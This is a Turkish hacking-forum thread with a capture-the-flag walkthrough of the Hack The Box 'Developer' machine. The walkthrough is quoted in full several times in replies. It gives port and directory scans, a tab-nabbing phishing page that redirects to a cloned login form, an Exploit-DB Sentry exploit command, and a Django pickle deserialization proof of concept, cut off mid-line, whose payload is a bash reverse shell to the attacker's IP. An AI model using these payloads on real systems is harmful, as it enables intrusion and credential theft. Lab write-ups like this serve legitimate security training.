[+] Django kullanarak web sitesini hacklemek

[legandrary]

Bugün Hack The Box'ın gelişmiş Developer makinesini kullanarak size Django kullanarak bir web sitesini nasıl hackleyeceğinizi göstereceğim. Ayrıca, bir XLS dosyasından şifreyi nasıl çıkaracağınızı ve Sekme Nabbing kimlik avı saldırısını nasıl kullanacağınızı öğreneceğiz.

Django kullanarak bir web sitesini hacklemek

Öncelikle / etc / hosts

dizinine makinenin IP adresini ekleyelim :

10.10.11.103    developer.htb

Bağlantı noktası taramasıyla başlayalım. Bu, herhangi bir sızma testi için standart bir işlemdir. Bağlantı noktası taraması, makinedeki hangi hizmetlerin bağlantıyı kabul ettiğini belirleyecektir.

En popüler tarayıcı Nmap'tir. Aşağıdaki komut dosyası tarama sonuçlarını iyileştirecektir:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

İki aşamalı çalışır. Birincisi düzenli bir hızlı tarama gerçekleştirir, ikincisi ise mevcut komut dosyalarını (seçenek - A ) kullanarak daha kapsamlı bir tarama gerçekleştirir.

80 - webden sorumlu
22 - SSH'yi çalıştırıyor
Yardım: kaba kuvvet hesapları

Henüz her zaman yetkilendirme gerektiren (SSH gibi) kimlik bilgilerine sahip olmadığımız için hizmetler hakkında bilgi edinmenin bir anlamı yok. Yapılabilecek tek şey şifreleri kaba kuvvetle kullanmaktır, ancak Hack The Box'a sahip makinelerin neredeyse her zaman farklı bir senaryosu vardır. Gerçekte bu tür seçenekler olmayabilir; üstelik şifreyi tahmin etme veya sosyal mühendislik kullanarak alma şansı da vardır .

Elbette web ile başlıyoruz!

Bir CTF (Capture The Flag) sitesinin web sitesi bizi karşılıyor. Kayıt ve yetkilendirme olasılığını görüyoruz, ancak ilginç bir şekilde PHP'de tek bir dosya yok. Belki bir Python çerçevesidir? Sitenin kök dizinindeki gizli dizinleri tarayarak tahminimizi kontrol edelim.

ffuf ile web taraması

Bir web uygulamasının güvenliğini test ederken ilk adım, dizin kaba kuvvet taramasıdır. Bu amaçla DIRB ve dirsearch gibi programları kullanabilirsiniz .

Hafif ve çok hızlı ffuf'u seviyorum . Başlatma seçenekleri:

-w - sözlük (kişisel olarak SecLists'teki sözlükleri tercih ederim );
-fc - 403 kodlu yanıtları sonuçtan hariç tutun;
-u - URL;
-t — iş parçacığı sayısı.
Komut şu şekilde çıkıyor:

ffuf -u http://developer.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt

Çıktı, 301 - yönlendirme kodlu birçok dizin içerecektir. Üzerlerine tıkladığımızda bizi Django framework’ünün admin paneli karşılıyor.

Başka bir şey bulamayınca ilk siteye kayıt oluyoruz.

Web sitesi farklı kategorilerden iki veya üç görev içeriyor ancak kullanıcı profili ayarlarının olduğu sayfa ilgimi çekti.

Metin alanlarının taranması herhangi bir sonuç üretmez. Görevlerden herhangi birini geçmeye çalışalım. Adli tıp ödevi phished_credentials'a bakmaya karar verdim . Görev şartlarına göre dosyanın bir yerinde bir şifre var.

Giriş noktası
Dosyayı açtıktan sonra gizli E sütununu görüyoruz. Belge şifreyle değiştirilmeye karşı korunduğu için sütunları genişletmek mümkün değil
dir.

Bu tür korumayı atlamak basittir. Arşiv olarak açın ve içinde istediğiniz sayfanın ayarlarını bulun. Bizim durumumuzda yalnızca bir tane olduğundan,

sayfa1 dosyasına ihtiyacımız var . xml

Bu dosyada şu satırı bulup siliyoruz ( sheetProtection field ):

<sheetProtection algorithmName="SHA-512" hashValue="Y4Ko7kZUKStIxaVGWEtuMeRdnCiN7O3D8qZtKdo/2jP7WE6yzKQXUcSWQ/E0OrqHCzhOBFX+t8Db5Pxaiu+N1g==" saltValue="EoiHQklf0FagPs+iW0OzkA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

Sayfa Koruma alanı

Dosyayı kaydedin ve belgeyi açın. Şimdi koruma yok. E sütununu genişletiyoruz ve sitenin bayrağını buluyoruz.

Geriye kalan tek şey web sitesindeki forma girmek.

Artık sayfayı güncelledikten sonra görünüm biraz değişti; yanıt gönderme düğmesi yerine çözüm gönderme düğmesi ortaya çıktı.

Ve bir dosya indirerek değil, sayfa URL'sini belirterek.

Yerel Python 3 web sunucusunu açın (

python3  - m http .server 80 komutu

) ve bağlantıyı gönderin:

http://10.10.14.59/writeup.html

Web sunucusu günlüklerinde belirtilen sayfaya bir istek buluyoruz. Burası test edilecek yer!

Ayrıca çözüm profil sayfasında görüntülenir.
Ancak görüntülemeye çalışırsanız yeni bir sekmede açılacaktır. Sayfanın kaynak kodunda,

<a> etiketinde target = "_blank" niteliğini buluyoruz

target = "_blank" özelliğine sahip <a> etiketinin href argümanı kontrolümüz

altında olduğunda ve hedef kullanıcı bağlantıyı takip edebildiğinde, orada bir phishing sitesi belirtme şansı vardır .

Kullanıcı, window

nesnesini kullanarak bağlantıyı tıkladığında . açıcıyı, yasal yetkilendirme sayfasının bir kopyasını içerecek olan kötü amaçlı kaynağımıza yönlendiririz. Bu, kullanıcıyı kimlik bilgilerini girmeye zorlamalıdır. Bu kimlik avı tekniğine Sekme Nabbing adı veriliyor.

Web sunucusu dizininde bir yazma dosyası oluşturalım . Aşağıdaki içeriğe sahip html .

<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://10.10.14.59/login.html');
if (window.parent != window) window.parent.location.replace('http://10.10.14.59/login.html');
</script>
</html>

Bu kod giriş sayfasını açmalıdır . html sunucumuzda. Şimdi sitedeki giriş sayfasını kopyalıyoruz. Bunu yapmak için, Firefox tarayıcısı için sayfanın tamamını tek bir

HTML

dosyasına kaydetmenize olanak tanıyan SingleFile uzantısını kullanıyorum.

Dosyayı giriş olarak kaydedelim .

html'yi açın ve kodunu biraz değiştirin. action = "auth.php"  ve method = "get"

niteliklerini belirtin .

Şimdi görev çözümünü tekrar gönderelim ve web sunucusu günlüklerinde onun isteğini göreceğiz, ardından oturum açmaya yönlendireceğiz . html ve kimlik bilgilerini auth'a gönderme .

php.ini

Bu kimlik bilgileri Django yönetici alanında oturum açmanıza olanak tanır

Dayanak noktası
Tüm yararlı bilgileri elde etmek için bölümleri gözden geçirelim. Burada kullanıcıların ve sitelerin bir listesini alabiliriz.

Yeni bir alan adı aldığımız için onu hemen /

etc / hosts dizinine

ekleyeceğiz . Artık girdimiz şöyle görünecek:

10.10.11.103    developer.htb developer-sentry.developer.htb

Ve Sentry web sitesinde bir yetkilendirme formuyla karşılaşacağız

Bir hizmet için yönetici şifremiz var; bu şifrenin burada da işe yarama ihtimali yüksek. Tek soru kullanıcı adıdır. Yönetici girişinin hatalı olduğu ortaya çıktı; admin @ geliştirici e-postasının tamamını girerseniz . htb veya admin @ geliştirici . ctf , ayrıca hiçbir şey alamıyoruz. Ama yöneticinin adı James. James @ geliştirici e-postasını deneyelim . htb ve siteye erişim sağlayın.

Aşağıda Sentry sürüm numarasını görüyoruz - 8.0.0. Bu en yenisi değil, bu yüzden açıkları aramaya değer . Böylece Google bizi Exploit-DB'ye, daha doğrusu 8.2.0 sürümünün istismarına yönlendiriyor .

İstismar işe yarıyor ama hiçbir şey vermiyor.

python3 50318.py --url 'http://developer-sentry.developer.htb' -U '[email protected]' -P 'SuperSecurePassword@HTB2021' -l 10.10.14.59 -p 4321

Bu yüzden manuel olarak deneriz.

Sentry, Python verilerini serileştirmek ve seri durumdan çıkarmak için gerekli olan turşu modülünü kullanır. Bu, kodun çalıştırılmasına yardımcı olabilir, ancak önce Django gizli anahtarına ihtiyacımız var.

Bir proje oluşturup silerek elde edilebilir: Proje Oluştur → Proje Ekle → Projeyi Kaydet → Proje Ayarı → Projeyi Kaldır.
Gizli anahtar göz önüne alındığında, ihtiyacımız olan kodu çalıştıracak bir nesneyi oluşturmak ve serileştirmek için aşağıdaki PoC'yi kullanabiliriz. İçinde değiştirmeniz gereken tek şey SECRET_KEY ve çerez değerleridir . Yük olarak ters kabuk kullanıyoruz:

/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"

[IMG]https://resmim.net/cdn/2024/09/15/m8QWjW.png[/IMG]

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='c7f3a64aa184b7cbb1a7cbe9cd544913'
cookie='.eJxrYKotZNQI5UxMLsksS80vSi9kimBjYGAoTs0rKaosZA5lKS5NyY_gAQoZRBnmmGUlBbq7FhVFcAEFSlKLS5Lz87MzU8FayvOLslNTQoXiE0tLMuJLi1OL4pMSk7NT81JClSDG6ZWWZOYU64Hk9VxzEzNzHIEsJ6gaXiR9mSnerKV6AOVwM6Y:1n8lto:4YBeYgMOt1ujubTsANFkmRr3fw4'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
   def __reduce__(self):
       return (os.system,('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"',))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(

Kapanış
Dostlar Ayrıcalık yüksekltme sonraki konu olsun çok yoruldum Kusura bakmayın

 

[OBT is HeRYerDe]

Eline Emeğine Sağlık Güzel Konu Beğendim.

 

[an0un]

Bugün Hack The Box'ın gelişmiş Developer makinesini kullanarak size Django kullanarak bir web sitesini nasıl hackleyeceğinizi göstereceğim. Ayrıca, bir XLS dosyasından şifreyi nasıl çıkaracağınızı ve Sekme Nabbing kimlik avı saldırısını nasıl kullanacağınızı öğreneceğiz.

Django kullanarak bir web sitesini hacklemek

Öncelikle / etc / hosts

dizinine makinenin IP adresini ekleyelim :

10.10.11.103    developer.htb

Bağlantı noktası taramasıyla başlayalım. Bu, herhangi bir sızma testi için standart bir işlemdir. Bağlantı noktası taraması, makinedeki hangi hizmetlerin bağlantıyı kabul ettiğini belirleyecektir.

En popüler tarayıcı Nmap'tir. Aşağıdaki komut dosyası tarama sonuçlarını iyileştirecektir:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

İki aşamalı çalışır. Birincisi düzenli bir hızlı tarama gerçekleştirir, ikincisi ise mevcut komut dosyalarını (seçenek - A ) kullanarak daha kapsamlı bir tarama gerçekleştirir.

80 - webden sorumlu
22 - SSH'yi çalıştırıyor
Yardım: kaba kuvvet hesapları

Henüz her zaman yetkilendirme gerektiren (SSH gibi) kimlik bilgilerine sahip olmadığımız için hizmetler hakkında bilgi edinmenin bir anlamı yok. Yapılabilecek tek şey şifreleri kaba kuvvetle kullanmaktır, ancak Hack The Box'a sahip makinelerin neredeyse her zaman farklı bir senaryosu vardır. Gerçekte bu tür seçenekler olmayabilir; üstelik şifreyi tahmin etme veya sosyal mühendislik kullanarak alma şansı da vardır .

Elbette web ile başlıyoruz!

Bir CTF (Capture The Flag) sitesinin web sitesi bizi karşılıyor. Kayıt ve yetkilendirme olasılığını görüyoruz, ancak ilginç bir şekilde PHP'de tek bir dosya yok. Belki bir Python çerçevesidir? Sitenin kök dizinindeki gizli dizinleri tarayarak tahminimizi kontrol edelim.

ffuf ile web taraması

Bir web uygulamasının güvenliğini test ederken ilk adım, dizin kaba kuvvet taramasıdır. Bu amaçla DIRB ve dirsearch gibi programları kullanabilirsiniz .

Hafif ve çok hızlı ffuf'u seviyorum . Başlatma seçenekleri:

-w - sözlük (kişisel olarak SecLists'teki sözlükleri tercih ederim );
-fc - 403 kodlu yanıtları sonuçtan hariç tutun;
-u - URL;
-t — iş parçacığı sayısı.
Komut şu şekilde çıkıyor:

ffuf -u http://developer.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt

Çıktı, 301 - yönlendirme kodlu birçok dizin içerecektir. Üzerlerine tıkladığımızda bizi Django framework’ünün admin paneli karşılıyor.

Başka bir şey bulamayınca ilk siteye kayıt oluyoruz.

Web sitesi farklı kategorilerden iki veya üç görev içeriyor ancak kullanıcı profili ayarlarının olduğu sayfa ilgimi çekti.

Metin alanlarının taranması herhangi bir sonuç üretmez. Görevlerden herhangi birini geçmeye çalışalım. Adli tıp ödevi phished_credentials'a bakmaya karar verdim . Görev şartlarına göre dosyanın bir yerinde bir şifre var.

Giriş noktası
Dosyayı açtıktan sonra gizli E sütununu görüyoruz. Belge şifreyle değiştirilmeye karşı korunduğu için sütunları genişletmek mümkün değil
dir.

Bu tür korumayı atlamak basittir. Arşiv olarak açın ve içinde istediğiniz sayfanın ayarlarını bulun. Bizim durumumuzda yalnızca bir tane olduğundan,

sayfa1 dosyasına ihtiyacımız var . xml

Bu dosyada şu satırı bulup siliyoruz ( sheetProtection field ):

<sheetProtection algorithmName="SHA-512" hashValue="Y4Ko7kZUKStIxaVGWEtuMeRdnCiN7O3D8qZtKdo/2jP7WE6yzKQXUcSWQ/E0OrqHCzhOBFX+t8Db5Pxaiu+N1g==" saltValue="EoiHQklf0FagPs+iW0OzkA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

Sayfa Koruma alanı

Dosyayı kaydedin ve belgeyi açın. Şimdi koruma yok. E sütununu genişletiyoruz ve sitenin bayrağını buluyoruz.

Geriye kalan tek şey web sitesindeki forma girmek.

Artık sayfayı güncelledikten sonra görünüm biraz değişti; yanıt gönderme düğmesi yerine çözüm gönderme düğmesi ortaya çıktı.

Ve bir dosya indirerek değil, sayfa URL'sini belirterek.

Yerel Python 3 web sunucusunu açın (

python3  - m http .server 80 komutu

) ve bağlantıyı gönderin:

http://10.10.14.59/writeup.html

Web sunucusu günlüklerinde belirtilen sayfaya bir istek buluyoruz. Burası test edilecek yer!

Ayrıca çözüm profil sayfasında görüntülenir.
Ancak görüntülemeye çalışırsanız yeni bir sekmede açılacaktır. Sayfanın kaynak kodunda,

<a> etiketinde target = "_blank" niteliğini buluyoruz

target = "_blank" özelliğine sahip <a> etiketinin href argümanı kontrolümüz

altında olduğunda ve hedef kullanıcı bağlantıyı takip edebildiğinde, orada bir phishing sitesi belirtme şansı vardır .

Kullanıcı, window

nesnesini kullanarak bağlantıyı tıkladığında . açıcıyı, yasal yetkilendirme sayfasının bir kopyasını içerecek olan kötü amaçlı kaynağımıza yönlendiririz. Bu, kullanıcıyı kimlik bilgilerini girmeye zorlamalıdır. Bu kimlik avı tekniğine Sekme Nabbing adı veriliyor.

Web sunucusu dizininde bir yazma dosyası oluşturalım . Aşağıdaki içeriğe sahip html .

<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://10.10.14.59/login.html');
if (window.parent != window) window.parent.location.replace('http://10.10.14.59/login.html');
</script>
</html>

Bu kod giriş sayfasını açmalıdır . html sunucumuzda. Şimdi sitedeki giriş sayfasını kopyalıyoruz. Bunu yapmak için, Firefox tarayıcısı için sayfanın tamamını tek bir

HTML

dosyasına kaydetmenize olanak tanıyan SingleFile uzantısını kullanıyorum.

Dosyayı giriş olarak kaydedelim .

html'yi açın ve kodunu biraz değiştirin. action = "auth.php"  ve method = "get"

niteliklerini belirtin .

Şimdi görev çözümünü tekrar gönderelim ve web sunucusu günlüklerinde onun isteğini göreceğiz, ardından oturum açmaya yönlendireceğiz . html ve kimlik bilgilerini auth'a gönderme .

php.ini

Bu kimlik bilgileri Django yönetici alanında oturum açmanıza olanak tanır

Dayanak noktası
Tüm yararlı bilgileri elde etmek için bölümleri gözden geçirelim. Burada kullanıcıların ve sitelerin bir listesini alabiliriz.

Yeni bir alan adı aldığımız için onu hemen /

etc / hosts dizinine

ekleyeceğiz . Artık girdimiz şöyle görünecek:

10.10.11.103    developer.htb developer-sentry.developer.htb

Ve Sentry web sitesinde bir yetkilendirme formuyla karşılaşacağız

Bir hizmet için yönetici şifremiz var; bu şifrenin burada da işe yarama ihtimali yüksek. Tek soru kullanıcı adıdır. Yönetici girişinin hatalı olduğu ortaya çıktı; admin @ geliştirici e-postasının tamamını girerseniz . htb veya admin @ geliştirici . ctf , ayrıca hiçbir şey alamıyoruz. Ama yöneticinin adı James. James @ geliştirici e-postasını deneyelim . htb ve siteye erişim sağlayın.

Aşağıda Sentry sürüm numarasını görüyoruz - 8.0.0. Bu en yenisi değil, bu yüzden açıkları aramaya değer . Böylece Google bizi Exploit-DB'ye, daha doğrusu 8.2.0 sürümünün istismarına yönlendiriyor .

İstismar işe yarıyor ama hiçbir şey vermiyor.

python3 50318.py --url 'http://developer-sentry.developer.htb' -U '[email protected]' -P 'SuperSecurePassword@HTB2021' -l 10.10.14.59 -p 4321

Bu yüzden manuel olarak deneriz.

Sentry, Python verilerini serileştirmek ve seri durumdan çıkarmak için gerekli olan turşu modülünü kullanır. Bu, kodun çalıştırılmasına yardımcı olabilir, ancak önce Django gizli anahtarına ihtiyacımız var.

Bir proje oluşturup silerek elde edilebilir: Proje Oluştur → Proje Ekle → Projeyi Kaydet → Proje Ayarı → Projeyi Kaldır.
Gizli anahtar göz önüne alındığında, ihtiyacımız olan kodu çalıştıracak bir nesneyi oluşturmak ve serileştirmek için aşağıdaki PoC'yi kullanabiliriz. İçinde değiştirmeniz gereken tek şey SECRET_KEY ve çerez değerleridir . Yük olarak ters kabuk kullanıyoruz:

/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"

[IMG]https://resmim.net/cdn/2024/09/15/m8QWjW.png[/IMG]

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='c7f3a64aa184b7cbb1a7cbe9cd544913'
cookie='.eJxrYKotZNQI5UxMLsksS80vSi9kimBjYGAoTs0rKaosZA5lKS5NyY_gAQoZRBnmmGUlBbq7FhVFcAEFSlKLS5Lz87MzU8FayvOLslNTQoXiE0tLMuJLi1OL4pMSk7NT81JClSDG6ZWWZOYU64Hk9VxzEzNzHIEsJ6gaXiR9mSnerKV6AOVwM6Y:1n8lto:4YBeYgMOt1ujubTsANFkmRr3fw4'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
   def __reduce__(self):
       return (os.system,('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"',))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(

Kapanış
Dostlar Ayrıcalık yüksekltme sonraki konu olsun çok yoruldum Kusura bakmayın

Ellerine sağlık dostum, ben django'nun çözümünü bulamadan sen halletmişsin bile

 

[legandrary]

Eline Emeğine Sağlık Güzel Konu Beğendim.

Çok teşekkürler hocam

Ellerine sağlık dostum, ben django'nun çözümünü bulamadan sen halletmişsin bile

Hahaaha biraz hızlı oldu

 

[Cernunnos]

Eline sağlık güzel bir konu sabite çekildi.

 

['Albatros]

Ellerine emeğine sağlık dostum muazzam bir konu olmuş

 

[legandrary]

Ellerine emeğine sağlık dostum muazzam bir konu olmuş

Teşekkür ederim dostum

 

[AnoNim__xxz]

Bugün Hack The Box'ın gelişmiş Developer makinesini kullanarak size Django kullanarak bir web sitesini nasıl hackleyeceğinizi göstereceğim. Ayrıca, bir XLS dosyasından şifreyi nasıl çıkaracağınızı ve Sekme Nabbing kimlik avı saldırısını nasıl kullanacağınızı öğreneceğiz.

Django kullanarak bir web sitesini hacklemek

Öncelikle / etc / hosts

dizinine makinenin IP adresini ekleyelim :

10.10.11.103    developer.htb

Bağlantı noktası taramasıyla başlayalım. Bu, herhangi bir sızma testi için standart bir işlemdir. Bağlantı noktası taraması, makinedeki hangi hizmetlerin bağlantıyı kabul ettiğini belirleyecektir.

En popüler tarayıcı Nmap'tir. Aşağıdaki komut dosyası tarama sonuçlarını iyileştirecektir:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

İki aşamalı çalışır. Birincisi düzenli bir hızlı tarama gerçekleştirir, ikincisi ise mevcut komut dosyalarını (seçenek - A ) kullanarak daha kapsamlı bir tarama gerçekleştirir.

80 - webden sorumlu
22 - SSH'yi çalıştırıyor
Yardım: kaba kuvvet hesapları

Henüz her zaman yetkilendirme gerektiren (SSH gibi) kimlik bilgilerine sahip olmadığımız için hizmetler hakkında bilgi edinmenin bir anlamı yok. Yapılabilecek tek şey şifreleri kaba kuvvetle kullanmaktır, ancak Hack The Box'a sahip makinelerin neredeyse her zaman farklı bir senaryosu vardır. Gerçekte bu tür seçenekler olmayabilir; üstelik şifreyi tahmin etme veya sosyal mühendislik kullanarak alma şansı da vardır .

Elbette web ile başlıyoruz!

Bir CTF (Capture The Flag) sitesinin web sitesi bizi karşılıyor. Kayıt ve yetkilendirme olasılığını görüyoruz, ancak ilginç bir şekilde PHP'de tek bir dosya yok. Belki bir Python çerçevesidir? Sitenin kök dizinindeki gizli dizinleri tarayarak tahminimizi kontrol edelim.

ffuf ile web taraması

Bir web uygulamasının güvenliğini test ederken ilk adım, dizin kaba kuvvet taramasıdır. Bu amaçla DIRB ve dirsearch gibi programları kullanabilirsiniz .

Hafif ve çok hızlı ffuf'u seviyorum . Başlatma seçenekleri:

-w - sözlük (kişisel olarak SecLists'teki sözlükleri tercih ederim );
-fc - 403 kodlu yanıtları sonuçtan hariç tutun;
-u - URL;
-t — iş parçacığı sayısı.
Komut şu şekilde çıkıyor:

ffuf -u http://developer.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt

Çıktı, 301 - yönlendirme kodlu birçok dizin içerecektir. Üzerlerine tıkladığımızda bizi Django framework’ünün admin paneli karşılıyor.

Başka bir şey bulamayınca ilk siteye kayıt oluyoruz.

Web sitesi farklı kategorilerden iki veya üç görev içeriyor ancak kullanıcı profili ayarlarının olduğu sayfa ilgimi çekti.

Metin alanlarının taranması herhangi bir sonuç üretmez. Görevlerden herhangi birini geçmeye çalışalım. Adli tıp ödevi phished_credentials'a bakmaya karar verdim . Görev şartlarına göre dosyanın bir yerinde bir şifre var.

Giriş noktası
Dosyayı açtıktan sonra gizli E sütununu görüyoruz. Belge şifreyle değiştirilmeye karşı korunduğu için sütunları genişletmek mümkün değil
dir.

Bu tür korumayı atlamak basittir. Arşiv olarak açın ve içinde istediğiniz sayfanın ayarlarını bulun. Bizim durumumuzda yalnızca bir tane olduğundan,

sayfa1 dosyasına ihtiyacımız var . xml

Bu dosyada şu satırı bulup siliyoruz ( sheetProtection field ):

<sheetProtection algorithmName="SHA-512" hashValue="Y4Ko7kZUKStIxaVGWEtuMeRdnCiN7O3D8qZtKdo/2jP7WE6yzKQXUcSWQ/E0OrqHCzhOBFX+t8Db5Pxaiu+N1g==" saltValue="EoiHQklf0FagPs+iW0OzkA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

Sayfa Koruma alanı

Dosyayı kaydedin ve belgeyi açın. Şimdi koruma yok. E sütununu genişletiyoruz ve sitenin bayrağını buluyoruz.

Geriye kalan tek şey web sitesindeki forma girmek.

Artık sayfayı güncelledikten sonra görünüm biraz değişti; yanıt gönderme düğmesi yerine çözüm gönderme düğmesi ortaya çıktı.

Ve bir dosya indirerek değil, sayfa URL'sini belirterek.

Yerel Python 3 web sunucusunu açın (

python3  - m http .server 80 komutu

) ve bağlantıyı gönderin:

http://10.10.14.59/writeup.html

Web sunucusu günlüklerinde belirtilen sayfaya bir istek buluyoruz. Burası test edilecek yer!

Ayrıca çözüm profil sayfasında görüntülenir.
Ancak görüntülemeye çalışırsanız yeni bir sekmede açılacaktır. Sayfanın kaynak kodunda,

<a> etiketinde target = "_blank" niteliğini buluyoruz

target = "_blank" özelliğine sahip <a> etiketinin href argümanı kontrolümüz

altında olduğunda ve hedef kullanıcı bağlantıyı takip edebildiğinde, orada bir phishing sitesi belirtme şansı vardır .

Kullanıcı, window

nesnesini kullanarak bağlantıyı tıkladığında . açıcıyı, yasal yetkilendirme sayfasının bir kopyasını içerecek olan kötü amaçlı kaynağımıza yönlendiririz. Bu, kullanıcıyı kimlik bilgilerini girmeye zorlamalıdır. Bu kimlik avı tekniğine Sekme Nabbing adı veriliyor.

Web sunucusu dizininde bir yazma dosyası oluşturalım . Aşağıdaki içeriğe sahip html .

<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://10.10.14.59/login.html');
if (window.parent != window) window.parent.location.replace('http://10.10.14.59/login.html');
</script>
</html>

Bu kod giriş sayfasını açmalıdır . html sunucumuzda. Şimdi sitedeki giriş sayfasını kopyalıyoruz. Bunu yapmak için, Firefox tarayıcısı için sayfanın tamamını tek bir

HTML

dosyasına kaydetmenize olanak tanıyan SingleFile uzantısını kullanıyorum.

Dosyayı giriş olarak kaydedelim .

html'yi açın ve kodunu biraz değiştirin. action = "auth.php"  ve method = "get"

niteliklerini belirtin .

Şimdi görev çözümünü tekrar gönderelim ve web sunucusu günlüklerinde onun isteğini göreceğiz, ardından oturum açmaya yönlendireceğiz . html ve kimlik bilgilerini auth'a gönderme .

php.ini

Bu kimlik bilgileri Django yönetici alanında oturum açmanıza olanak tanır

Dayanak noktası
Tüm yararlı bilgileri elde etmek için bölümleri gözden geçirelim. Burada kullanıcıların ve sitelerin bir listesini alabiliriz.

Yeni bir alan adı aldığımız için onu hemen /

etc / hosts dizinine

ekleyeceğiz . Artık girdimiz şöyle görünecek:

10.10.11.103    developer.htb developer-sentry.developer.htb

Ve Sentry web sitesinde bir yetkilendirme formuyla karşılaşacağız

Bir hizmet için yönetici şifremiz var; bu şifrenin burada da işe yarama ihtimali yüksek. Tek soru kullanıcı adıdır. Yönetici girişinin hatalı olduğu ortaya çıktı; admin @ geliştirici e-postasının tamamını girerseniz . htb veya admin @ geliştirici . ctf , ayrıca hiçbir şey alamıyoruz. Ama yöneticinin adı James. James @ geliştirici e-postasını deneyelim . htb ve siteye erişim sağlayın.

Aşağıda Sentry sürüm numarasını görüyoruz - 8.0.0. Bu en yenisi değil, bu yüzden açıkları aramaya değer . Böylece Google bizi Exploit-DB'ye, daha doğrusu 8.2.0 sürümünün istismarına yönlendiriyor .

İstismar işe yarıyor ama hiçbir şey vermiyor.

python3 50318.py --url 'http://developer-sentry.developer.htb' -U '[email protected]' -P 'SuperSecurePassword@HTB2021' -l 10.10.14.59 -p 4321

Bu yüzden manuel olarak deneriz.

Sentry, Python verilerini serileştirmek ve seri durumdan çıkarmak için gerekli olan turşu modülünü kullanır. Bu, kodun çalıştırılmasına yardımcı olabilir, ancak önce Django gizli anahtarına ihtiyacımız var.

Bir proje oluşturup silerek elde edilebilir: Proje Oluştur → Proje Ekle → Projeyi Kaydet → Proje Ayarı → Projeyi Kaldır.
Gizli anahtar göz önüne alındığında, ihtiyacımız olan kodu çalıştıracak bir nesneyi oluşturmak ve serileştirmek için aşağıdaki PoC'yi kullanabiliriz. İçinde değiştirmeniz gereken tek şey SECRET_KEY ve çerez değerleridir . Yük olarak ters kabuk kullanıyoruz:

/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"

[IMG]https://resmim.net/cdn/2024/09/15/m8QWjW.png[/IMG]

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='c7f3a64aa184b7cbb1a7cbe9cd544913'
cookie='.eJxrYKotZNQI5UxMLsksS80vSi9kimBjYGAoTs0rKaosZA5lKS5NyY_gAQoZRBnmmGUlBbq7FhVFcAEFSlKLS5Lz87MzU8FayvOLslNTQoXiE0tLMuJLi1OL4pMSk7NT81JClSDG6ZWWZOYU64Hk9VxzEzNzHIEsJ6gaXiR9mSnerKV6AOVwM6Y:1n8lto:4YBeYgMOt1ujubTsANFkmRr3fw4'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
   def __reduce__(self):
       return (os.system,('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"',))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(

Kapanış
Dostlar Ayrıcalık yüksekltme sonraki konu olsun çok yoruldum Kusura bakmayın

Eline sağlık çok yararlı olmuş

 

[legandrary]

Eline sağlık çok yararlı olmuş

Teşekkürler

 

[By 4lp3r3n]

wordpress konusu açtığında herkes sövmüştü şimdiden kendini çok geliştirmişssin ayrıca güzel konu tebrikler

 

[crash-d4rk-h4cker]

Eline sağlık

 

[legandrary]

wordpress konusu açtığında herkes sövmüştü şimdiden kendini çok geliştirmişssin ayrıca güzel konu tebrikler

Teşekkür ederim dostum sağol

Eline sağlık

Teşekkürler

 

[lyxG]

güzel olmuş ellerine sağlık.

 

[legandrary]

güzel olmuş ellerine sağlık.

Teşekkürler

 

[ACE Veen]

Bugün Hack The Box'ın gelişmiş Developer makinesini kullanarak size Django kullanarak bir web sitesini nasıl hackleyeceğinizi göstereceğim. Ayrıca, bir XLS dosyasından şifreyi nasıl çıkaracağınızı ve Sekme Nabbing kimlik avı saldırısını nasıl kullanacağınızı öğreneceğiz.

Django kullanarak bir web sitesini hacklemek

Öncelikle / etc / hosts

dizinine makinenin IP adresini ekleyelim :

10.10.11.103    developer.htb

Bağlantı noktası taramasıyla başlayalım. Bu, herhangi bir sızma testi için standart bir işlemdir. Bağlantı noktası taraması, makinedeki hangi hizmetlerin bağlantıyı kabul ettiğini belirleyecektir.

En popüler tarayıcı Nmap'tir. Aşağıdaki komut dosyası tarama sonuçlarını iyileştirecektir:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

